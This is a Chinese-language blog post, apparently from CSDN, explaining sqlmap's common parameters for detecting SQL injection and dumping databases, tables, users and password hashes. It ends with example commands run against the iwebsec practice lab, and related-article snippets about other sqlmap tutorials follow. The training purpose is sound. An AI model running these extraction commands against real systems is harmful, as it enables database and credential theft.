sqlmap使用

想吃炸鸡TAT

已于 2024-06-03 19:12:10 修改

阅读量402

点赞数 5

分类专栏：渗透测试工具使用文章标签：安全

于 2024-06-03 19:05:04 首次发布

本文链接：https://blog.csdn.net/qq_73212565/article/details/139422032

版权

渗透测试工具使用专栏收录该内容

1 篇文章 0 订阅

订阅专栏

sqlmap的主要功能是:自动检测、利用SQL注入漏洞和对数据库执行相应地攻击

常用参数：

对目标：

--u 指定url，检测注入点
--cookie cookie注入
-D 指定数据库
-T 指定表
-C 指定字段

对脱库：

--dbs 获取数据库
--tables 获取表
--columns 获取字段
--schema 字段类型
--dump 获取数据

对其他：

--batch 不再询问确认
--level=5 测试等级（1-5）
--risk=3 风险等级（0-3）

对账号：

--user 获取用户
--passwords 获取密码（哈希值）

eg：拿在线网站iwebsec 靶场漏洞库中SQL注入漏洞第一关数字型注入举例

（由于我使用的版本是用python脚本写的，因此需用python跑）

获取数据库：

python sqlmap.py -u http://www.iwebsec.com:81/sqli/01.php?id=1 --dbs --batch

显示所有表名：

python sqlmap.py -u http://www.iwebsec.com:81/sqli/01.php?id=1 -D iwebsec --tables

显示表所有信息：

python sqlmap.py -u http://www.iwebsec.com:81/sqli/01.php?id=1 -T user --dump

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

想吃炸鸡TAT

关注关注

5
点赞
踩
4

收藏

觉得还不错? 一键收藏
2
评论
sqlmap使用

（由于我使用的版本是用python脚本写的，因此需用python跑）
复制链接

扫一扫

专栏目录

史上最详细的sqlmap使用教程

大河之犬的博客

09-19

5万+

sqlmapsqlmap是一个自动化的SQL注入工具，其主要功能是扫描，发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等Sqlmap采用了以下5种独特的SQL注入技术基于布尔类型的盲注，即可以根据返回页面判断条件真假的注入。

sqlmap 使用教程

weixin_46962006的博客

11-14

2万+

sqlmap 使用教程前言个人观点，若有误请指教 Options（选项） -h：帮助文档 -‌-version：查看sqlmap版本信息 -v:显示详细信息 ·0：只显示python的错误和一些严重性的信息 ·1：显示基本信息（默认） ·2：显示debug信息 ·3：显示注入过程的payload ·4：显示http请求包 ·5：显示http响应头 ·6：显示http响应页面 Target（目标

2 条评论您还未登录，请先登录后发表或查看评论

SQLMap使用详解

未完成的歌~的博客

02-19

2万+

文章目录前言：一、SQLMap介绍1、Sqlmap简介：2、Sqlmap支持的注入方式：二、SQLMap安装三、SQLMap使用：1、判断是否存在注入：2、判断文本中的请求是否存在注入：3、查询当前用户下的所有数据库：4、获取数据库中的表名：5、获取表中的字段名：6、获取字段内容：7、获取数据库的所有用户：8、获取数据库用户的密码：9、获取当前网站数据库的名称：10、获取当前网站数据库的用户名称：四、SQLMap进阶：参数讲解1、-- level 5：探测等级2、-- is-dba：当前用户是否为管理权限3

sqlmap使用教程

hmysn的博客

07-27

1万+

sqlmap是一个自动化的SQL注入工具，主要功能是扫描、发现，并利用给定url的SQL注入漏洞。

sqlmap使用手册

越努力越自由

03-25

9873

一. sqlmap介绍相对于手工注入，sqlmap的高效注入大大提高了我们渗透效率。Sqlmap采用了以下5种独特的SQL注入技术：联合查询，在可以使用Union的情况下注入（注入效率最高，成本最低）报错注入，即页面会返回错误信息，或者把注入的语句的结果直接返回到页面中布尔盲注，即可以根据返回页面判断条件真假的注入延时注入，即不能根据页面返回的内容判断任何信息，要用条件语句查看时间延迟语句是否已经执行(即页面返回时间是否增加)来判断堆叠查询，可以同时执行多条语句时的注入...

SQLmap使用教程图文教程（超详细）

热门推荐

wangyuxiang946的博客

06-20

4万+

SQLmap是一款自动化SQL注入工具，kali自带。路径 /usr/share/sqlmap 一、目标 1、指定url 2、指定文件（批量检测） 3、指定数据库/表/字段 4、post请求 5、cookie注入二、脱库 1、获取数据库 2、获取表 3、获取字段 4、获取字段类型 5、获取值（数据） 6、获取用户 7、获取主机名 8、搜索库、表、字段。 9、正在执行的SQL语句三、WAF绕过

sqlmap 使用篇

weixin_45626840的博客

03-15

800

理解里sqlmap的原理，那么就可以无所畏惧地使用sqlmap了。sqlmap提供了许功能，这些功能都应该为我们所用，也就是必须提供我们使用方法，或者说接口。sqlmap的功能接口体现在一个个参数上——options。额，，几乎所有的命令行的使用接口都是体现在可传入的参数上以下是sqlmap的所有参数选项_____H__# 选项===========================================================Options:Request:_____H__

SQLMap使用攻略

duxiayang的博客

11-17

918

Sqlmap注入技巧

sqlmap使用总结

buffedon的博客

06-11

581

sqlmap使用总结1. 基本用法2. 使用sqlmap探测waf并绕过3. python脚本绕过网站4. 伪造http referer头部探测风险等级5. 执行语句6. 从数据库读文件7. 上传文件到数据库 1. 基本用法 sqlmap -r http.txt #http.txt是我们抓取的http的请求包 sqlmap -r http.txt -p username #指定参数，当有多个参数而你又知道username参数存在SQL漏洞，你就可以使用-p指定参数进行探测 sqlmap -u "

SQLMAP使用笔记.pdf

01-25

SQLMAP 使用笔记 SQLMAP 是一个开源的渗透测试工具，用于检测和利用 SQL 注入漏洞。下面是 SQLMAP 的使用笔记，包括常用参数、选项和示例。一、SQLMAP 的基本使用 SQLMAP 的基本语法为：`sqlmap -u <url> ...

Sqlmap使用手册中文版

01-13

学习使用Sqlmap，除了阅读其官方文档和用户手册，还可以配合像sqli-labs这样的实验系统进行实践。用户手册详尽地介绍了Sqlmap的所有选项和开关，提供了丰富的实例，帮助用户理解和掌握如何有效使用这个工具。当...

【盖世汽车-注册安全分析报告】

09-02

1351

盖世汽车(上海盖世网络技术有限公司)是汽车产业专业的信息服务平台，为企业及行业人士提供一站式服务。

网络安全宗旨和目标

网络研究观

09-02

672

【精选】文件摆渡系统：跨网文件传输的安全与效率之选

文件数据安全交换

09-06

658

同时满足安全与效率兼顾的文件摆渡系统，那就是Ftrans飞驰云联的《Ftrans Ferry跨网文件安全交换系统》，这是一款由飞驰云联自主研发的安全产品，可以有效解决内外网间、多个网络之间、HPC环境下、云租户之间的跨网文件摆渡需求，通过多审核审批、日志审计、防病毒、DLP检测、传输加密、权限管控、传输加速等，实现统一的文件摆渡安全管控，提高网间数据交互效率。支持企业微信、钉钉等进行消息通知集成。系统内置DLP检测功能，可检测文件的大小、文件名、文件个数、文件来源、敏感内容、文件类型、是否含有病毒等。

架构设计（13）安全架构设计理论

追赶时代的博客

09-01

1625

信息安全的架构设计，比如网络安全设计，数据库安全设计

网络安全售前入门09安全服务——安全加固服务

打工人

09-02

1285

安全加固服务是参照风险评估、等保测评、安全检查等工作的结果，基于科学的安全思维方式、长期的安全服务经验积累、对行业的深刻理解、处理安全事件的最佳实践，为客户提供完善的安全加固方案，并在客户侧反馈完成加固后，提供二次评估服务，从而帮助客户达到修补信息系统脆弱性，提高系统安全性，满足相关政策法规的目的。

剖析Cookie的工作原理及其安全风险